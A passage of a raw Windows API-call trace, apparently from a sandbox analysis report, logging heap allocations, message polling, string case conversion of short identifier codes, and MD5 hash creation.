returned 0 [0201.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0201.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0201.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0201.123] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0201.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0201.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0201.123] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0201.123] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0201.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0201.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0201.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0201.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0201.123] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0201.123] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.123] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0201.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0201.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0201.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0201.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0201.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0201.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0201.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0201.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0201.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0201.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0201.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0201.125] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0201.125] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0201.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0201.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0201.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0201.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0201.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0201.125] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0201.125] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0201.125] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0201.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0201.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0201.125] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0201.125] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0201.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0201.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0201.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0201.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0201.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0201.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0201.126] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0201.126] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0201.126] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0201.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0201.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0201.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0201.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0201.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0201.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0201.126] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0201.126] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0201.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0201.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0201.126] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0201.126] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0201.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0201.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0201.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0201.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0201.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0201.127] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0201.127] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0201.127] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0201.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0201.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0201.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0201.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0201.127] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0201.127] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0201.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.127] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0201.127] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0201.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0201.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0201.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0201.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0201.128] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0201.128] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0201.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0201.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0201.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0201.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0201.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0201.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0201.128] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0201.128] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0201.128] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0201.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0201.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0201.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0201.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0201.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0201.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0201.129] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0201.129] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0201.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0201.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0201.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0201.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0201.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0201.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0201.129] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0201.129] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0201.129] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0201.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0201.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0201.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0201.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0201.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0201.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0201.129] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0201.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0201.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0201.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0201.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0201.130] CryptCreateHash (in: hProv=0xad63f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0201.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0201.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0201.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0201.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0201.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0201.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0201.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0201.130] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0201.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0201.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0201.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0201.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0201.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0201.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0201.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0201.131] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.131] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0201.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0201.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0201.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0201.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0201.131] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0201.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0201.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0201.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0201.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0201.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0201.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0201.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0201.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0201.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0201.132] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0201.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0201.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0201.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0201.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0201.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0201.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0201.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0201.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0201.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0201.133] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0201.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0201.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0201.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0201.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0201.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0201.133] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0201.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0201.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0201.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0201.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0201.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0201.133] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0201.133] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0201.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0201.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0201.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0201.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0201.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0201.134] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0201.134] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0201.134] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0201.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0201.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0201.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0201.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0201.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0201.134] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0201.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0201.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0201.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0201.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0201.134] CryptHashData (hHash=0xaa5660, pbData=0x24b13d8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0201.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0201.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0201.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0201.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0201.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0201.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0201.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0201.135] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.135] RtlAllocateHeap 